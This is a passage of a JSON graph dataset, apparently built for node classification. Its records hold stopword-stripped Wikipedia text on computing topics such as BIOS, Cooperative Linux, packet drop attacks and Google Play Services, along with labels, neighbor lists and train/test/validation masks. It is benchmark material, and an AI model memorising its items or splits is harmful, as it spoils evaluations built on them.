his/her password given amount time two-way authentication involves user system network convincing know shared password without transmitting password communication channel done using password encryption key transmit randomly generated piece information “ challenge. ” side must return similarly encrypted value predetermined function originally offered information his/her “ response ” proves he/she able decrypt challenge kerberos computer network authentication protocol good example sends encrypted integer n response must encrypted integer n 1 access rights authority levels rights power granted users create change delete view data files within system network rights vary user user range anonymous login guest privileges superuser root privileges guest superuser accounts two extremes individual access rights denied granted user usually system administrator a.k.a superuser ability grant deny rights guest accounts anonymous logins set multiple users log account time without password users sometimes asked type username account limited access often allowed access special public files usually anonymous accounts read access rights security purposes superuser authority level assigned system administrators computer operating systems unix related operating systems level also called root access rights system including changing ownership files pre-windows xp nt systems dos windows 9x users effectively superusers users access rights windows nt related systems windows 2000 xp superuser known administrator account however administrator account may may exist depending whether separation",
    "neighbors": [
      11175,
      2737,
      6098,
      9745,
      5433,
      700,
      2558,
      10207
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1512,
    "label": 4,
    "text": "Packet_drop_attack:packet drop attack computer networking packet drop attack blackhole attack type denial-of-service attack router supposed relay packets instead discards usually occurs router becoming compromised number different causes one cause mentioned research denial-of-service attack router using known ddos tool packets routinely dropped lossy network packet drop attack hard detect prevent malicious router also accomplish attack selectively e.g dropping packets particular network destination certain time day packet every n packets every seconds randomly selected portion packets rather called greyhound attack malicious router attempts drop packets come attack actually discovered fairly quickly common networking tools traceroute also routers notice compromised router dropping traffic generally begin remove router forwarding tables eventually traffic flow attack however malicious router begins dropping packets specific time period every n packets often harder detect traffic still flows across network packet drop attack frequently deployed attack wireless ad hoc networks wireless networks much different architecture typical wired network host broadcast shortest path towards destination traffic directed host compromised host able drop packets also mobile ad hoc network hosts specifically vulnerable collaborative attacks multiple hosts become compromised deceive hosts network",
    "neighbors": [
      2409,
      11461
    ],
    "mask": "None"
  },
  {
    "node_id": 1513,
    "label": 3,
    "text": "Cooperative_Linux:cooperative linux cooperative linux abbreviated colinux software allows microsoft windows linux kernel run simultaneously parallel machine cooperative linux utilizes concept cooperative virtual machine cvm contrast traditional virtual machines cvm shares resources already exist host os traditional vm hosts resources virtualized every guest os cvm gives oss complete control host machine traditional vm sets every guest os unprivileged state access real machine term cooperative used describe two entities working parallel effect cooperative linux turns two different operating system kernels two big coroutines kernel complete cpu context address space kernel decides give control back partner however kernels theoretically full access real hardware modern pc hardware designed controlled two different operating systems time therefore host kernel left control real hardware guest kernel contains special drivers communicate host provide various important devices guest os host os kernel exports basic primitives allow cooperative linux portable driver run cpl0 mode ring 0 allocate memory dan aloni originally started development cooperative linux based similar work user-mode linux announced development 25 jan 2004 july 2004 presented paper linux symposium source released gnu general public license developers since contributed various patches additions software cooperative linux significantly different full x86 virtualization generally works running guest os less privileged mode host kernel resources delegated host kernel contrast cooperative linux runs specially modified linux kernel cooperative takes responsibility sharing resources nt kernel instigating race conditions changes cooperative linux patch i386 tree—the supported architecture cooperative time writing changes mostly additions virtual drivers cobd block device conet network cocon console changes i386 tree involve initialization setup code goal cooperative linux kernel design remain close possible standalone i386 kernel changes localized minimized much possible colinux package installs port linux kernel virtual network device run simultaneously version windows operating system windows 2000 windows xp use virtual machine vmware debian ubuntu fedora gentoo especially popular colinux users due rather unusual structure virtual hardware installing linux distributions colinux generally difficult therefore users cases use either existing linux installation real partition ready made filesystem image distributed project filesystem images made variety methods including taking images normal linux system finding ways make installers run strange hardware building installs hand using package manager simply upgrading existing images using tools like yum apt easier way get up-to-date filesystem image use qemu install linux convert image stripping first 63 512-byte blocks described colinux wiki since colinux access native graphics hardware x window x servers run colinux directly one install x server windows cygwin/x xming use kde gnome almost linux application distribution issues fixed using colinux based distributions andlinux based ubuntu topologilinux based slackware",
    "neighbors": [
      6150,
      4616,
      6153,
      2058,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      7733,
      3649,
      4161,
      5697,
      8772,
      6213,
      5702,
      8268,
      589,
      7248,
      593,
      4695,
      10851,
      6244,
      5222,
      10856,
      4207,
      9839,
      5244,
      4734,
      11391,
      7812,
      6797,
      4238,
      7821,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      2212,
      8364,
      7349,
      10933,
      5815,
      2236,
      5822,
      5824,
      1736,
      6345,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      8445,
      6910,
      5378,
      4360,
      1291,
      4367,
      8976,
      8466,
      792,
      10016,
      6438,
      295,
      10537,
      7983,
      9525,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      1362,
      7507,
      11606,
      5975,
      11095,
      2910,
      10079,
      10091,
      11121,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      10149,
      4521,
      4011,
      1456,
      1972,
      9655,
      5049,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 1514,
    "label": 8,
    "text": "Google_Tag_Manager:google tag manager google tag manager tag management system created google manage javascript html tags used tracking analytics websites variants e-marketing tags sometimes referred tracking pixels web beacons google announced google tag manager october 2012 version 1 tag manager launched following default tag templates version 2 launched october 2014 making product cleaner simpler use google also announced tag manager api release version 2",
    "neighbors": [
      10450,
      3462
    ],
    "mask": "Train"
  },
  {
    "node_id": 1515,
    "label": 2,
    "text": "BIOS:bios bios acronym basic input/output system also known system bios rom bios pc bios non-volatile firmware used perform hardware initialization booting process power-on startup provide runtime services operating systems programs bios firmware comes pre-installed personal computer system board first software run powered name originates basic input/output system used cp/m operating system 1975 bios originally proprietary ibm pc reverse engineered companies looking create compatible systems interface original system serves de facto standard bios modern pcs initializes tests system hardware components loads boot loader mass memory device initializes operating system era dos bios provided hardware abstraction layer keyboard display input/output i/o devices standardized interface application programs operating system recent operating systems use bios loading instead accessing hardware components directly bios implementations specifically designed work particular computer motherboard model interfacing various devices make complementary system chipset originally bios firmware stored rom chip pc motherboard modern computer systems bios contents stored flash memory rewritten without removing chip motherboard allows easy end-user updates bios firmware new features added bugs fixed also creates possibility computer become infected bios rootkits furthermore bios upgrade fails brick motherboard permanently unless system includes form backup case unified extensible firmware interface uefi successor legacy pc bios aiming address technical shortcomings term bios basic input/output system created gary kildall first appeared cp/m operating system 1975 describing machine-specific part cp/m loaded boot time interfaces directly hardware cp/m machine usually simple boot loader rom versions ms-dos pc dos dr-dos contain file called variously io.sys ibmbio.com ibmbio.sys drbios.sys file known dos bios also known dos i/o system contains lower-level hardware-specific part operating system together underlying hardware-specific operating system-independent system bios resides rom represents analogue cp/m bios introduction ps/2 machines ibm divided system bios real- protected-mode portions real-mode portion meant provide backward compatibility existing operating systems dos therefore named cbios compatibility bios whereas abios advanced bios provided new interfaces specifically suited multitasking operating systems os/2 bios original ibm pc xt interactive user interface error codes messages displayed screen coded series sounds generated signal errors power-on self-test post proceeded point successfully initializing video display adapter options ibm pc xt set switches jumpers main board expansion cards starting around mid-1990s became typical bios rom include bios configuration utility bcu bios setup utility accessed system power-up particular key sequence program allowed user set system configuration options type formerly set using dip switches interactive menu system controlled keyboard interim period ibm-compatible pcsincluding ibm atheld configuration settings battery-backed ram used bootable configuration program disk rom set configuration options contained memory disk supplied computer lost system settings could changed applied general computers eisa bus configuration program called eisa configuration utility ecu modern wintel-compatible computer provides setup routine essentially unchanged nature rom-resident bios setup utilities late 1990s user configure hardware options using keyboard video display also errors occur boot time modern bios usually displays user-friendly error messages often presented pop-up boxes tui style offers enter bios setup utility ignore error proceed possible instead battery-backed ram modern wintel machine may store bios configuration settings flash rom perhaps flash rom holds bios early intel processors started physical address 000ffff0h systems later processors provide logic start running bios system rom system powered reset button pressed cold boot full power-on self-test post run ctrl+alt+delete pressed warm boot special flag value stored nonvolatile bios memory cmos tested bios allows bypass lengthy post memory detection post identifies initializes system devices cpu ram interrupt dma controllers parts chipset video display card keyboard hard disk drive optical disc drive basic hardware early ibm pcs routine post would download program ram keyboard port run feature intended factory test diagnostic purposes option rom scan completed detected rom modules valid checksums called immediately post bios version scan option roms bios calls int 19h start boot processing post-boot programs loaded also call int 19h reboot system must careful disable interrupts asynchronous hardware processes may interfere bios rebooting process else system may hang crash rebooting int 19h called bios attempts locate boot loader software boot device hard disk floppy disk cd dvd loads executes first boot software finds giving control pc bios uses boot devices set eeprom cmos ram earliest pcs dip switches bios checks device order see bootable attempting load first sector boot sector sector read bios proceeds next device sector read successfully bioses also check boot sector signature 0x55 0xaa last two bytes sector 512 bytes long accepting boot sector considering device bootable bootable device found bios transfers control loaded sector bios interpret contents boot sector possibly check boot sector signature last two bytes interpretation data structures like partition tables bios parameter blocks done boot program boot sector programs loaded boot process non-disk device network adapter attempts booting procedure defined option rom equivalent integrated motherboard bios rom option roms may also influence supplant boot process defined motherboard bios rom user select boot priority implemented bios example computers hard disk bootable usually removable-media drive higher boot priority user cause removable disk booted modern bioses boot priority order configured user older bioses limited boot priority options selectable earliest bioses fixed priority scheme implemented floppy disk drives first fixed disks i.e hard disks second typically boot devices supported subject modification rules installed option roms bios early pc also usually would boot first floppy disk drive first hard disk drive even two drives installed el torito optical media boot standard optical drive actually emulates 3.5 high-density floppy disk bios boot purposes reading first sector cd-rom dvd-rom simply defined operation like floppy disk hard disk furthermore complexity medium makes difficult write useful boot program one sector bootable virtual floppy disk contain software provides access optical medium native format original ibm pc xt bootable disk found rom basic started calling int 18h since programs used basic rom clone pc makers left computer failed boot disk would display rom basic halt response int 18h later computers would display message like bootable disk found would prompt disk inserted key pressed retry boot process modern bios may display nothing may automatically enter bios configuration utility boot process fails environment boot program simple cpu real mode general-purpose segment registers undefined except cs ss sp dl cs always zero ip initially codice_1 boot programs always loaded fixed address need boot program relocatable dl may contain drive number used int 13h boot device ss sp points valid stack presumably large enough support hardware interrupts otherwise ss sp undefined stack must already set order interrupts serviced interrupts must enabled order system timer-tick interrupt bios always uses least maintain time-of-day count initializes post active keyboard work keyboard works even bios keyboard service called keystrokes received placed 15-character type-ahead buffer maintained bios boot program must set stack size stack set bios unknown location likewise variable although boot program investigate default stack examining ss sp easier shorter unconditionally set new stack boot time bios services available memory address codice_2 contains interrupt vector table bios post initialized system timers interrupt controller dma controller motherboard/chipset hardware necessary bring bios services ready status dram refresh system dram conventional memory extended memory necessarily expanded memory set running interrupt vectors corresponding bios interrupts set point appropriate entry points bios hardware interrupt vectors devices initialized bios set point bios-provided isrs interrupts including ones bios generates programs hook set default dummy isr immediately returns bios maintains reserved block system ram addresses codice_3 various parameters initialized post memory address codice_4 used boot program may even overwrite peripheral cards hard disk drive controllers video display adapters bios extension option roms provide additional functionality bios code extensions runs bios boots system mass storage roms typically test initialize hardware add new bios services augment replace existing bios services versions services example scsi controller usually bios extension rom adds support hard drives connected controller video cards extension roms replace video services motherboard bios video services bios extension roms gain total control machine fact anything may never return control bios invoked extension rom could principle contain entire operating system application program could implement entirely different boot process booting network operation ibm-compatible computer system completely changed removing inserting adapter card rom chip contains bios extension rom motherboard bios typically contains code access hardware components necessary bootstrapping system keyboard display storage addition plug-in adapter cards scsi raid network interface cards video boards often include bios e.g video bios complementing replacing system bios code given component even devices built motherboard behave way option roms stored separate code main bios flash chip upgraded either tandem separately main bios add-in card requires option rom card supported main bios card needs initialized made accessible bios services operating system loaded usually means required bootstrapping process even required option rom allow adapter card used without loading driver software storage device booting begins option rom time taken load driver driver take space ram hard disk driver software rom always stays device two accidentally separated also rom card peripheral hardware driver software provided rom installed together extra effort install software additional advantage rom early pc systems notably including ibm pcjr rom faster main system ram modern systems case much reverse bios rom code usually copied shadowed ram run faster many methods utilities examining contents various motherboard bios expansion roms microsoft debug unix dd expansion rom wishes change way system boots network device scsi adapter bios driver code cooperative way use bios boot specification bbs api register ability expansion roms registered using bbs apis user select among available boot options within bios user interface bbs compliant pc bios implementations allow user enter bios user interface expansion roms finished executing registering bbs api specification downloaded acpica website official title bios boot specification version 1.01 11 january 1996 also expansion rom wishes change way system boots unilaterally simply hook int 19h interrupts normally called interrupt 19h int 13h bios disk service intercept bios boot process replace bios boot process one merely modify boot sequence inserting boot actions preventing bios detecting certain devices bootable bios boot specification promulgated way expansion roms implement boot capability devices supported booting native bios motherboard motherboard bios completes post bios versions search option rom modules also called bios extension roms execute motherboard bios scans extension roms portion upper memory area part x86 real-mode address space address 0xa0000 runs rom found order discover memory-mapped isa option roms bios implementation scans real-mode address space codice_5 codice_6 2 kib boundaries looking two-byte rom signature 0x55 followed 0xaa valid expansion rom signature followed single byte indicating number 512-byte blocks expansion rom occupies real memory next byte option rom entry point also known entry offset checksum specified number 512-byte blocks calculated rom valid checksum bios transfers control entry address normal bios extension rom beginning extension initialization routine point extension rom code takes typically testing initializing hardware controls registering interrupt vectors use post-boot applications may use bios services including provided previously initialized option roms provide user configuration interface display diagnostic information anything else requires possible option rom return bios pre-empting bios boot sequence altogether option rom normally return bios completing initialization process option rom returns bios continues searching option roms calling found entire option rom area memory space scanned option roms normally reside adapter cards however original pc perhaps also pc xt spare rom socket motherboard system board ibm terms option rom inserted four roms contain basic interpreter also removed replaced custom roms option roms ibm pcjr unique among pcs two rom cartridge slots front cartridges slots map region upper memory area used option roms cartridges contain option rom modules bios would recognize cartridges also contain types rom modules basic programs handled differently one pcjr cartridge contain several rom modules different types possibly stored together one rom chip bios rom customized particular manufacturer hardware allowing low-level services reading keystroke writing sector data diskette provided standardized way programs including operating systems example ibm pc might either monochrome color display adapter using different display memory addresses hardware single standard bios system call may invoked display character specified position screen text mode graphics mode bios provides small library basic input/output functions operate peripherals keyboard rudimentary text graphics display functions forth using ms-dos bios services could accessed application program ms-dos executing int 13h interrupt instruction access disk functions executing one number documented bios interrupt calls access video display keyboard cassette device functions operating systems executive software designed supersede basic firmware functionality provide replacement software interfaces application software applications also provide services began even 1980s ms-dos programmers observed using bios video services graphics display slow increase speed screen output many programs bypassed bios programmed video display hardware directly graphics programmers particularly exclusively demoscene observed technical capabilities pc display adapters supported ibm bios could taken advantage without circumventing since at-compatible bios ran intel real mode operating systems ran protected mode 286 later processors required hardware device drivers compatible protected mode operation replace bios services modern personal computers running modern operating systems bios used booting initial loading system software operating system first graphical screen displayed input output typically handled bios boot menu textual menu windows allows users choose operating system boot boot safe mode use last known good configuration displayed bios receives keyboard input bios modern pcs still boot run legacy operating systems ms-dos dr-dos rely heavily bios console disk i/o providing system bios bios-compatible firmware necessarily case uefi-based pcs intel processors reprogrammable microcode since p6 microarchitecture bios may contain patches processor microcode fix errors initial processor microcode reprogramming persistent thus loading microcode updates performed time system powered without reprogrammable microcode expensive processor swap would required example pentium fdiv bug became expensive fiasco intel required product recall original pentium processor defective microcode could reprogrammed bioses contain software licensing description table slic digital signature placed inside bios original equipment manufacturer oem example dell slic inserted acpi table contains active code computer manufacturers distribute oem versions microsoft windows microsoft application software use slic authenticate licensing oem windows installation disk system recovery disc containing windows software systems slic preactivated oem product key verify xml formatted oem certificate slic bios means self-activating see system locked preinstallation slp user performs fresh install windows need possession oem key either slp coa digital certificate slic order bypass activation achieved user performs restore using pre-customised image provided oem power users copy necessary certificate files oem image decode slp product key perform slp activation manually cracks non-genuine windows distributions usually edit slic emulate order bypass windows activation bios implementations allow overclocking action cpu adjusted higher clock rate manufacturer rating guaranteed capability overclocking may however seriously compromise system reliability insufficiently cooled computers generally shorten component lifespan overclocking incorrectly performed may also cause components overheat quickly mechanically destroy operating systems example ms-dos rely bios carry input/output tasks within pc bios still runs 16-bit real mode calling bios services directly inefficient protected-mode operating systems bios services used modern multitasking operating systems initially load importance primary part bios greatly reduced initially later bios implementations took complex functions including interfaces advanced configuration power interface acpi functions include power management hot swapping thermal management time since 2010 bios technology transitional process toward uefi historically bios ibm pc xt built-in user interface bios versions earlier pcs xt-class software configurable instead users set options via dip switches motherboard later computers including ibm-compatibles 80286 cpus battery-backed nonvolatile bios memory cmos ram chip held bios settings settings video-adapter type memory size hard-disk parameters could configured running configuration program disk built rom special reference diskette inserted ibm configure settings memory size early bios versions passwords boot-device selection options bios hard-coded boot first floppy drive failed first hard disk access control early at-class machines physical keylock switch hard defeat computer case could opened anyone could switch computer could boot later 386-class computers started integrating bios setup utility rom alongside bios code computers usually boot bios setup utility certain key key combination pressed otherwise bios post boot process executed modern bios setup utility menu-based user interface ui accessed pressing certain key keyboard pc starts usually key advertised short time early startup example press f1 enter cmos setup actual key depends specific hardware features present bios setup utility typically include modern bios setup screen often features pc health status hardware monitoring tab directly interfaces hardware monitor chip mainboard makes possible monitor cpu chassis temperature voltage provided power supply unit well monitor control speed fans connected motherboard system booted hardware monitoring computer fan control normally done directly hardware monitor chip separate chip interfaced i²c smbus come part super i/o solution interfaced low pin count lpc operating systems like netbsd envsys openbsd sysctl hw.sensors feature integrated interfacing hardware monitors normally done without interaction bios however certain circumstances bios vendor also provides underlying information hardware monitoring acpi case operating system may using acpi perform hardware monitoring done example asustek motherboards ai booster feature modern pcs bios stored rewritable memory allowing contents replaced modified rewriting contents sometimes termed flashing based common use kind eeprom known technically flash eeprom colloquially flash memory done special program usually provided system manufacturer post bios image hard drive usb flash drive file containing contents sometimes termed bios image bios might reflashed order upgrade newer version fix bugs provide improved performance support newer hardware reflashing operation might needed fix damaged bios original ibm pc bios cassette basic stored mask-programmed read-only memory rom chips sockets motherboard roms could replaced altered users allow updates many compatible computers used re-programmable memory devices eprom later flash memory devices according robert braver president bios manufacturer micro firmware flash bios chips became common around 1995 electrically erasable prom eeprom chips cheaper easier program standard ultraviolet erasable prom eprom chips flash chips programmed re-programmed in-circuit eprom chips need removed motherboard re-programming bios versions upgraded take advantage newer versions hardware correct bugs previous revisions bioses beginning ibm pcs supported hardware clock settable bios century bit allowed manually changing century year 2000 happened bios revisions created 1995 nearly bios revisions 1997 supported year 2000 setting century bit automatically clock rolled past midnight december 31 1999 first flash chips attached isa bus starting 1997 bios flash moved lpc bus functional replacement isa following new standard implementation known firmware hub fwh 2006 first systems supporting serial peripheral interface spi appeared bios flash memory moved size bios capacity rom eeprom media may stored increased time new features added code bios versions exist sizes 16 megabytes contrast original ibm pc bios contained 8 kib mask rom modern motherboards including even bigger nand flash memory ics board capable storing whole compact operating systems linux distributions example asus motherboards included splashtop os embedded nand flash memory ics however idea including operating system along bios rom pc new 1980s microsoft offered rom option ms-dos included roms pc clones tandy 1000 hx another type firmware chip found ibm pc early compatibles keyboard interface controlled microcontroller programmable memory ibm 40-pin socketed device manufacturers used eprom version chip resembled eprom controller also assigned a20 gate function manage memory one-megabyte range occasionally upgrade keyboard bios necessary take advantage software could use upper memory bios may contain components memory reference code mrc responsible handling memory timings related hardware settings ibm published entire listings bios original pc pc xt pc contemporary pc models appendix ibm pc technical reference manual machine type effect publication bios listings anyone see exactly definitive bios may 1984 phoenix software associates released first rom-bios enabled oems build essentially 100 -compatible clones without reverse-engineer ibm pc bios compaq done portable helping fuel growth pc compatibles industry sales non-ibm versions dos first american megatrends ami bios released 1986 new standards grafted onto bios usually without complete public documentation bios listings result easy learn intimate details many non-ibm additions bios core bios services pc motherboard suppliers license bios core toolkit commercial third-party known independent bios vendor ibv motherboard manufacturer customizes bios suit hardware reason updated bioses normally obtained directly motherboard manufacturer major bios vendors include american megatrends ami insyde software phoenix technologies byosoft former vendors include award software microid research acquired phoenix technologies 1998 phoenix later phased award brand name general software also acquired phoenix 2007 sold bios intel processor based embedded systems open source community increased effort develop replacement proprietary bioses future incarnations open sourced counterpart libreboot coreboot openbios/open firmware projects amd provided product specifications chipsets google sponsoring project motherboard manufacturer tyan offers coreboot next standard bios opteron line motherboards msi gigabyte technology followed suit msi k9nd ms-9282 msi k9sd ms-9185 resp m57sli-s4 models eeprom chips advantageous easily updated user customary hardware manufacturers issue bios updates upgrade products improve compatibility remove bugs however advantage risk improperly executed aborted bios update could render computer device unusable avoid situations recent bioses use boot block portion bios runs first must updated separately code verifies rest bios intact using hash checksums methods transferring control boot block detects corruption main bios typically warn user recovery process must initiated booting removable media floppy cd usb flash drive user try flashing bios motherboards backup bios sometimes referred dualbios boards recover bios corruptions least four known bios attack viruses two demonstration purposes first one found wild mebromi targeting chinese users first bios virus cih also known chernobyl virus able erase flash rom bios content compatible chipsets cih appeared mid-1998 became active april 1999 often infected computers could longer boot people remove flash rom ic motherboard reprogram cih targeted then-widespread intel i430tx motherboard chipset took advantage fact windows 9x operating systems also widespread time allowed direct hardware access programs modern systems vulnerable cih variety chipsets used incompatible intel i430tx chipset also flash rom ic types also extra protection accidental bios rewrites form boot blocks protected accidental overwrite dual quad bios equipped systems may event crash use backup bios also modern operating systems freebsd linux macos windows nt-based windows os like windows 2000 windows xp newer allow user-mode programs direct hardware access result 2008 cih become essentially harmless worst causing annoyance infecting executable files triggering antivirus software bios viruses remain possible however since windows home users without windows vista/7 uac run applications administrative privileges modern cih-like virus could principle still gain access hardware without first using exploit operating system openbsd prevents users access grsecurity patch linux kernel also prevents direct hardware access default difference attacker requiring much difficult kernel level exploit reboot machine second bios virus technique presented john heasman principal security consultant uk-based next-generation security software 2006 black hat security conference showed elevate privileges read physical memory using malicious procedures replaced normal acpi functions stored flash memory third bios virus technique called persistent bios infection appeared 2009 cansecwest security conference vancouver syscan security conference singapore researchers anibal sacco alfredo ortega core security technologies demonstrated insert malicious code decompression routines bios allowing nearly full control pc start-up even operating system booted proof-of-concept exploit flaw bios implementation involves normal bios flashing procedures thus requires physical access machine user root despite requirements ortega underlined profound implications sacco discovery patch driver drop fully working rootkit even little code remove disable antivirus mebromi trojan targets computers awardbios microsoft windows antivirus software two chinese companies rising antivirus jiangmin kv antivirus mebromi installs rootkit infects master boot record december 2013 interview 60 minutes deborah plunkett information assurance director us national security agency claimed nsa uncovered thwarted possible bios attack foreign nation state targeting us financial system program cited anonymous sources alleging chinese plot however follow-up articles guardian atlantic wired register refuted nsa claims bios replaced complex extensible firmware interface efi many new machines efi specification replaces runtime interface legacy bios initially written intel itanium architecture efi available x86 x86-64 platforms specification development driven unified efi forum industry special interest group efi booting supported microsoft windows versions supporting gpt linux kernel 2.6.1 later macos intel-based macs new pc hardware predominantly ships uefi firmware architecture rootkit safeguard also prevent system running user software changes makes uefi controversial bios replacement open hardware community alternatives functionality legacy bios x86 world include coreboot libreboot servers workstations use platform-independent open firmware ieee-1275 based forth programming language included sun sparc computers ibm rs/6000 line powerpc systems chrp motherboards along x86-based olpc xo-1 least 2015 apple removed legacy bios support macbook pro computers bless utility longer supports -- legacy switch prints legacy mode supported system macs also boot cd-rom usb flash drives",
    "neighbors": [
      6148,
      7173,
      6150,
      8197,
      1032,
      10756,
      532,
      533,
      28,
      3101,
      4637,
      6173,
      1058,
      4642,
      3109,
      1071,
      4150,
      4666,
      2111,
      576,
      9791,
      3140,
      585,
      4695,
      91,
      9307,
      1637,
      10856,
      8301,
      2159,
      5744,
      1137,
      9337,
      1660,
      4221,
      5756,
      640,
      8834,
      4228,
      647,
      6797,
      8333,
      7311,
      2193,
      9363,
      8345,
      4767,
      9377,
      2722,
      2213,
      7847,
      4264,
      2729,
      7849,
      4270,
      6321,
      178,
      1202,
      2231,
      5312,
      2244,
      3272,
      2762,
      6859,
      7887,
      3281,
      7377,
      1237,
      7893,
      217,
      9947,
      10971,
      3294,
      1247,
      3297,
      8418,
      5356,
      4334,
      1776,
      242,
      3314,
      2804,
      3317,
      5363,
      8439,
      5368,
      6393,
      9970,
      2811,
      252,
      255,
      11008,
      5384,
      1801,
      5386,
      6924,
      8976,
      8977,
      8978,
      3352,
      3866,
      7963,
      10016,
      5922,
      292,
      6436,
      3366,
      9512,
      5930,
      1324,
      9006,
      7983,
      823,
      4408,
      4409,
      2874,
      7998,
      3904,
      9539,
      11076,
      9541,
      7495,
      9549,
      2383,
      10063,
      1873,
      11601,
      10067,
      9557,
      4441,
      11103,
      1891,
      11623,
      8552,
      8553,
      1386,
      9066,
      6510,
      2415,
      2416,
      11634,
      3445,
      10102,
      1399,
      1400,
      1915,
      9597,
      6014,
      1408,
      10113,
      389,
      1414,
      4998,
      5000,
      10635,
      8590,
      6033,
      10130,
      8090,
      9119,
      5024,
      11169,
      1958,
      3496,
      10153,
      7603,
      7093,
      8629,
      440,
      6587,
      10173,
      8126,
      4548,
      6597,
      455,
      8136,
      1993,
      9166,
      5073,
      4563,
      5080,
      5596,
      477,
      2525,
      2019,
      4581,
      6118,
      1005,
      7151,
      6129,
      499,
      6644,
      8700,
      2045,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 1516,
    "label": 2,
    "text": "Google_Play_Services:google play services google play services proprietary background service api package android devices google first introduced 2012 provided simple access google+ apis oauth 2.0 since expanded cover large variety google services allowing applications easily communicate services common means april 2018 installed five billion times android devices google play game services used application developers allow competitive social experience use leaderboards public friends achievements multiplayer sessions saved games api available quickly sync game saves google cloud infrastructure well location apis provide specifications location technologies providing geofencing apis scheduling specific actions upon user entering leaving specific geographic boundaries fused location provider acquiring location information reduced power usage activity recognition allowing applications adapt current action user e.g cycling walking etc. google+ platform provides single sign-on allowing user automatically authenticated inside applications providing personalized experience sharing options using google+ google maps android api allows applications include google maps street view without need open separate application allowing full control camera providing means adding custom markers overlays map google drive android api allows google drive used storage structure providing easy lookup syncing documents along various tools manipulating files google cast android api adds casting functionality allow android applications display content tvs using google cast additionally providing various helpers common audio video image types google mobile ads integrate advertisements applications allowing simple monetization million google advertisers sophisticated ad targeting based factors user location google wallet instant buy allows purchases services goods done google wallet providing streamlined flow taps minimized data entry done user google play services provides apis google fit api google account authentication methods google analytics apis google play services used almost google apps system-level powers provide multiple internal features major android services controlled google play services without apps may work properly google play protect unification android security systems operated google two years launch company announced software scanning 50 million apps per day announcement made google i/o 2019 part company focus privacy security tuesday keynote presentations google play services automatically updated google play devices application installed running android 4.1 newer means google fast silent rollouts updates providing new functionality older devices without manufacturers update android firmware working around fragmentation platform become infamous android open source project aosp announced 2007 functioned baseline system oems firmware modifications cyanogenmod lineageos various apps aosp abandoned instead released google play closed-source model many apps function google play services available many google apps like gmail youtube google maps party interested distributing google play services part google apps package must acquire license google often results contractual agreement locking manufacturer android additionally enthusiasts able interested signing agreement interested modifying android system required either opt-out google play services obtain google apps package either device pre-installed unofficial source google play services page google developers",
    "neighbors": [
      5637,
      11273,
      8719,
      3600,
      7700,
      3100,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      6750,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      8446,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      5433,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      5100,
      5613,
      5620,
      11252,
      2045,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 1517,
    "label": 6,
    "text": "Gfarm_file_system:gfarm file system gfarm file system open-source distributed file system generally used large-scale cluster computing wide-area data sharing provides features manage replica location explicitly name derived grid data farm architecture implements grid datafarm petascale data-intensive computing project initiated japan project collaboration among high energy accelerator research organization kek national institute advanced industrial science technology aist high performance computing infrastructure project university tokyo tokyo institute technology university tsukuba challenge involves construction peta- exascale parallel filesystem exploiting local storage pcs spread worldwide grid",
    "neighbors": [
      1801,
      2314,
      7983,
      823,
      2395,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1518,
    "label": 4,
    "text": "*82:*82 vertical service code *82 enables calling line identification regardless subscriber preference dialed unblock withheld numbers private callers u.s. per-call basis caller id subscribed enabled line receiving call unblocked phone number registered name displayed – unable determine caller subscribes outgoing callerid blocking *82 dialed temporarily override subscription *82 dialed u.s. land-line house phones business lines well cell phones mobile devices mobile devices may alternatively offer require menu selection override caller id blocking per call correctly unblock number listen dial tone dial *82 listen momentary flashing dial tone confirms override establish connection usual dialing 1 area code phone number complete call anonymous call rejection *77 offered subscribers situations necessary dial *82 order ring complete call lines subscribe enable anonymous call rejection notice given anonymous callers intervening recorded message phone company rejected anonymous call may completed caller id enabled valid star 82 review literary journal published since 2012 named *82 function star 82 code needed unblock one phone number tell us someone answer",
    "neighbors": [
      11170,
      5163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1519,
    "label": 4,
    "text": "The_Hacker's_Handbook:hacker handbook hacker handbook non-fiction book four editions reprinted numerous times 1985 1990 explaining phone computer systems period could 'hacked contains candid personal comments book british author hugo cornwall pseudonym peter sommer research fellow information systems security london school economics frequently appears united kingdom courts expert digital evidence computer forensics well media pundit author information security topics one popular aspect book salacious printouts actual hacking attempts although confidential details passwords blacked first edition version easily available download published 1985 last four editions edited steve gold appeared 1989 reprints running 1990 1990 uk parliament passed computer misuse act publication additional editions might construed incitement commit offence act",
    "neighbors": [
      4435,
      4956,
      10110,
      9319
    ],
    "mask": "Test"
  },
  {
    "node_id": 1520,
    "label": 5,
